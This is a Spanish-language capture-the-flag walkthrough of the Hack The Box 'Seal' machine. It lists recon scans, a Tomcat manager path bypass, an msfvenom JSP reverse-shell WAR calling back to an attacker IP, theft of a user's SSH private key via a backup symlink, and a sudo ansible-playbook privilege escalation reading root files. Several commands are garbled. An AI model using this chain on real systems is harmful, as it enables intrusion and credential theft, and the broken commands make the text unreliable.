Seal

Jul 21, 2021
HTB Linux

echo “10.129.186.118 seal.htb” | sudo tee -a /etc/hosts

nmap -A -p- -oA seal 10.129.186.118 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA seal 10.129.186.118

nmap -sU -O -p- -oA seal-udp 10.129.186.118

nikto -h 10.129.186.118:80

gobuster dir -k -u http://10.129.186.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

fuff -w /usr/share/wordlists/dirb/big.txt -u http://10.129.186.118/FUZZ -t 200

ssh_command.

Vamos a http://10.129.186.118:8080

ssh_command.

Vamos a http://10.129.186.118:8080/register y creamos un usuario

ssh_command.

Vamos a root /seal market y vemos tomcat-users.xml

ssh_command.

Encontramos el usuario tomcat con su contrasena

ssh_command.

Vamos a http://10.129.186.118/manager/status

Y usamos las credenciales de tomcat que encontramos en el paso anterior.

ssh_command.

Vamos a http://10.129.186.118/manager/status/..;/html

ssh_command.

msfvenom ip java/jsp_shell_reverse_tcp LHOST=10.10.14.95 LPORT=4444 -f war -o seal_shell.war

ssh_command.

Subimos el archivo war en la pagina de aplicaciones

ssh_command.

Refrescamos la pagina y vemos seal_shell.war se subio

Le damos click a deploy

nc -lvnp 4444

ssh_command.

Conseguimos un reverse shell

ps -aux | grep -i ‘bin/sh’

ssh_command.

ls -ahl /opt/backups/archives

cd /var/lib/tomcat9/webapps/ROOT/admin/dashboard/

cd /home

cd luis

ssh_command.

ln -s /home/luis.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

cd .ssh

cp /opt/backups/archives/backup-2021-07-21-17:30:33.gz rsa.gz

gzip -kd rsa

ssh_command.

cd .ssh

python3 -m http.server 8888

wget http://10.129.186.118:8888/id_rsa.pub

chmod 600 id_rsa

ssh -i id_rsa luis@seal.htb

ssh_command.

Crear archivo root.yml

name: Ansible Copy Example Local to Remote hosts: localhost tasks:
- name: copying file with playbook become: true copy: src: /root/root.txt dest: /dev/shm owner: luis group: luis
  mode: 0777 sudo /usr/bin/ansible-playbook root.yml

ssh_command.